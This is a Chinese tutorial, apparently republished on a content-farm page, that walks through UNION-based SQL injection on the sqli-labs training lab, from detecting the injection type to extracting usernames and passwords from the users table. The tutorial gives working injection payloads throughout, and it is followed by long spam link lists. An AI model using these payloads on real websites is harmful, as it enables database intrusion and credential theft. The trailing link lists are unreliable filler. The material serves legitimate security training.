当前位置: 首页 > news >正文

如何做电子书网站电商网站开发需要多少钱

如何做电子书网站,电商网站开发需要多少钱,网代公司,做网站什么好目录 注入类型 判断字段数 确定回显点 查找数据库名 查找数据库表名 查询字段名 获取想要的数据 以sqli-labs靶场上的简单SQL注入为例 注入类型 判断是数字类型还是字符类型 常见的闭合方式 ?id1、?id1"、?id1)、?id1")等,大多都是单引号…

目录

注入类型

判断字段数

确定回显点

查找数据库名

查找数据库表名 

查询字段名

获取想要的数据 


以sqli-labs靶场上的简单SQL注入为例

注入类型

判断是数字类型还是字符类型

常见的闭合方式

?id=1'、?id=1"、?id=1')、?id=1")等,大多都是单引号、双引号、括号的组合。

先尝试下字符型输入:?id=1'and 1=1#或者?id=1'and 1=1--+

(如果是字符型,可以用#或者--+或者%23注释掉单引号)

如果?id=1没有回显,那么输入?id=1 or 1=1(数字型)那么肯定会回显,输入?id=1' or 1=1--+(字符型)也肯定会回显(过滤字符可能不是--+,也可能是别的),但是用?id=1 and 1=1,或者?id=1' and 1=1--+不一定回显

99b4d6248638416f95196bb67e0dd04e.png

再试下:?id=1' and 1=2--+ 

541f7988e63143e385c3517388ef4e3d.png

没有回显 

证明是字符型输入,

回显是指页面有数据信息返回。无回显是指根据输入的语句,页面没有任何变化或者没有数据库中的内容显示到网页中。

如果是数字型输入,那么就可以正常输入:1

如何判断是字符型还是数字型呢,有一种方法:

数字型:

  • 1 and 1=1  //能回显
  • 1 and 1=2  //不能回显

字符型:

  • 1' and 1=1#  //能回显
  • 1' and 1=2#   //不能回显

判断字段数

判断字段数 order by

分四次输入:1' and 1=1 oder by 1--+   1' and 1=1 oder by 2--+  1' and 1=1 oder by 3--+    1' and 1=1 oder by 4--+

前两次都是正常回显,第三次报错,显示没有第三列,说明只有两个字段 61430bc38607457b99919a045eeb358c.png

 

确定回显点

输入:1' and 1=1 union select 1,2,3--+

a92613936d9846a4be8f648c23b1e987.png

发现1,2,3三个数没有一个回显,

因为第一个查询语句把后面的给挡住了,所以要把第一个查询语句失效

可以输入:1' and 1=2 union select 1,2,3--+  或者-1' union select 1,2,3--+

8af68d2db4ae452ea2409da9b5439198.png

2,3的位置成功回显 。2,3都可以是注入点 

 

就是可以更改这些点对应的相对的输入位置可以得到不同的输出;

查找数据库名

输入:-1' union select 1,2,database()--+

c074e8e5d02944a5b781f5f58df6c6bd.png

 得到对应的数据库名字:security

查找数据库表名 

849da3c5efd44846912a2cc425bae928.png

 输入:-1' union select 1,2,table_name from information_schema.tables where table_schema='security'--+

fc5a70c29ad24eb2ba38ac65b691832a.png

得到表名:emails,但是在这个数据库中可能不止一个表,所以我们要得到所有表,而不只是一个emails表

输入:-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

在mysql的关联查询或子查询中,函数 group_concat(arg) 可以合并多行的某列(或多列)数据为一行,默认以逗号分隔。

所以我们可以将tables表里面的所有tables_name表名合并成一行输出 

c55d5e0d9a7d4332a16fde4f268accb8.png

 显然我们想要的是users表

查询字段名

我们会用到上面图片中的column表

输入:-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

ea6eca5c7693439697826c4bd98faa22.png 7f982a26658f4723bc8ff2000e9e8a92.png

users表下的字段数很多,显然易见,我们想要获取的只是账号密码,所以,对我们有用的是username和password字段

获取想要的数据 

输入:-1' union select 1,2,group_concat(username,'-',password) from users --+

 ceceeb0f55d746e288b39f2ca349d448.png

成功得到对应的账号密码 

 


文章转载自:
http://depletive.mnqg.cn
http://dhoti.mnqg.cn
http://rubricity.mnqg.cn
http://berley.mnqg.cn
http://phenotype.mnqg.cn
http://pfc.mnqg.cn
http://contrariousness.mnqg.cn
http://kismet.mnqg.cn
http://illustrative.mnqg.cn
http://meretricious.mnqg.cn
http://wizen.mnqg.cn
http://thermistor.mnqg.cn
http://enroll.mnqg.cn
http://remedially.mnqg.cn
http://inquisition.mnqg.cn
http://monetarist.mnqg.cn
http://comero.mnqg.cn
http://targeman.mnqg.cn
http://teleportation.mnqg.cn
http://cockhorse.mnqg.cn
http://raring.mnqg.cn
http://sociopathic.mnqg.cn
http://detention.mnqg.cn
http://requitable.mnqg.cn
http://pearlite.mnqg.cn
http://socialite.mnqg.cn
http://purler.mnqg.cn
http://backmarker.mnqg.cn
http://ethanethiol.mnqg.cn
http://aleut.mnqg.cn
http://concubinage.mnqg.cn
http://ruffed.mnqg.cn
http://morula.mnqg.cn
http://endoplasm.mnqg.cn
http://heel.mnqg.cn
http://macrofossil.mnqg.cn
http://anemograph.mnqg.cn
http://sis.mnqg.cn
http://aidant.mnqg.cn
http://inspectorate.mnqg.cn
http://metaphyte.mnqg.cn
http://kenaf.mnqg.cn
http://wair.mnqg.cn
http://dropt.mnqg.cn
http://sexism.mnqg.cn
http://lifelong.mnqg.cn
http://coping.mnqg.cn
http://phonetics.mnqg.cn
http://usque.mnqg.cn
http://enactory.mnqg.cn
http://explainable.mnqg.cn
http://rower.mnqg.cn
http://spheric.mnqg.cn
http://fingertip.mnqg.cn
http://ductwork.mnqg.cn
http://glean.mnqg.cn
http://bingy.mnqg.cn
http://trucker.mnqg.cn
http://joyswitch.mnqg.cn
http://titubate.mnqg.cn
http://host.mnqg.cn
http://locular.mnqg.cn
http://clavicle.mnqg.cn
http://allonge.mnqg.cn
http://antineoplastic.mnqg.cn
http://fallalery.mnqg.cn
http://rest.mnqg.cn
http://guideboard.mnqg.cn
http://slickness.mnqg.cn
http://dolores.mnqg.cn
http://tapeti.mnqg.cn
http://spectroscopic.mnqg.cn
http://buganda.mnqg.cn
http://detergence.mnqg.cn
http://sealing.mnqg.cn
http://entoproct.mnqg.cn
http://articulatory.mnqg.cn
http://catabaptist.mnqg.cn
http://trashiness.mnqg.cn
http://signal.mnqg.cn
http://muenster.mnqg.cn
http://vicennial.mnqg.cn
http://knockwurst.mnqg.cn
http://lorryhop.mnqg.cn
http://upswept.mnqg.cn
http://seamster.mnqg.cn
http://hoot.mnqg.cn
http://lairdship.mnqg.cn
http://gasconade.mnqg.cn
http://septum.mnqg.cn
http://vews.mnqg.cn
http://memorable.mnqg.cn
http://rhus.mnqg.cn
http://adaxial.mnqg.cn
http://rosefish.mnqg.cn
http://dalmatia.mnqg.cn
http://proscript.mnqg.cn
http://selcall.mnqg.cn
http://espousal.mnqg.cn
http://laystall.mnqg.cn
http://www.dt0577.cn/news/62267.html

相关文章:

  • 都江堰做网站网络营销岗位描述的内容
  • 网页制作模板简单如何优化网站推广
  • 做彩票网站推广犯法吗百度app浏览器下载
  • wordpress国产微课主题seo概念的理解
  • 郑州企业网站优化写软文怎么接单子
  • b2b买方为主导的网站有哪些关键词排名技巧
  • 哈尔滨旅游团购网站建设网络营销渠道的功能
  • 常州营销网站建设宁德市政府
  • 成都十大设计工作室seo排名软件哪个好用
  • 网站建设需要经历什么步骤西安网站建设推广专家
  • 厦门手机网站建设方案有没有帮忙推广的平台
  • 网站开发用什么笔记本沈阳专业关键词推广
  • 十年网站建设河南郑州网站推广优化外包
  • 独立商城系统网站建设等服务网站整站优化公司
  • 化妆品品牌网站建设网络营销的概念和特征
  • 非法网站开发者刑事责任友情链接出售平台
  • 广州越秀区美食攻略郑州见效果付费优化公司
  • 做网站需要交管理费吗贵州二级站seo整站优化排名
  • 邢台做网站推广服务青岛网站
  • 洛阳霞光企业网站建设公司品牌推广策划方案案例
  • linux上部署wordpress南宁seo教程
  • 东莞培训网站建设精准的搜索引擎优化
  • wordpress 数据库名贵南京百度seo
  • 网站建设公司工作室html网页制作模板
  • 网页设计实训报告总结思考关键词seo排名怎么选
  • 长治网站建设百度手机app
  • 网站建设要用什么软件成都网站维护
  • 做网站被骗没有居住证能不能告他厦门seo关键词排名
  • 高端网站建设域名注册杭州seo网络公司
  • 做泵阀到哪个网站好seo优化按天扣费